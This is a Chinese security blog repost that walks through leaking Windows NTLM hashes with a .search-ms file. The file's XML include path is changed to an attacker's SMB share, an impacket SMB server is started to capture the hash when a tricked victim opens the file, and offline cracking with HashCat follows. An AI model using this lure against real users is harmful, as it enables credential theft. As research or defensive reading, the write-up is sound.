文章总结： 本文介绍利用Windows.search-ms文件泄露NTLM哈希的方法。.search-ms是记录搜索条件的XML，攻击者可将其路径修改为远程SMB服务器地址。诱导受害者双击后，资源管理器自动发起连接并触发NTLM认证，使攻击者截获哈希值。文章详细演示了修改XML和使用impacket抓包的过程，并建议后续用HashCat离线破解。 综合评分： 85 文章分类： 红队,漏洞POC,内网渗透,办公安全,渗透测试

[安全研究篇]利用.search-ms泄露NTLM哈希

flower安全

2026年1月13日 16:13 甘肃

以下文章来源于安静安全 ，作者静师傅

安静安全 .

安静安全励志于安全研究

点击蓝色字体关注我们

description

.search-ms文件本质上是一个遵循特定格式的XML文件。当你在Windows资源管理器中保存搜索时，系统会将你的搜索条件（如位置、文件名、类型、日期等）记录在此XML文件中。当你双击该文件时，Windows会读取这些条件并执行新的搜索，由于.search-ms文件可控,攻击者可以将内容XML的路径修改为远程UNC 路径SMB服务器，诱使用户点击并运行。这可以激活explorer.exe的搜索功能，从而资源管理器在调用的过程中触发NTLM哈希值的获取，攻击者可以利用此漏洞诱骗用户打开文件以获取NTLM哈希值，然后使用HashCat工具进行离线破解以获取明文密码。

复现

首先，我们需要在搜索栏中搜索如字符“poc”，并点击保存搜索

保存在D盘，文件名为poc.search-ms

用记事本打开

在XML中找到include path这里的位置

<include path=”::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\D:”

改为攻击者的远程SMB服务器地址

<include path=”\Remote attacker address\share”

在kali中启动SMB服务器，命令如下：

impacket-smbserver share . -smb2support

模拟受害者被欺骗双击运行了poc.search-ms

成功获取NTLM哈希值，后续可离线破解还原明文

相关阅读

[零日全网首发!]腾达路由器命令注入

[安全研究篇]关于微软powershell零日漏洞的POC

powershell-CVE-2025-54100漏洞POC补充复现

#

喜欢我们请点个在看呀~

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：flower安全 《[安全研究篇]利用.search-ms泄露NTLM哈希》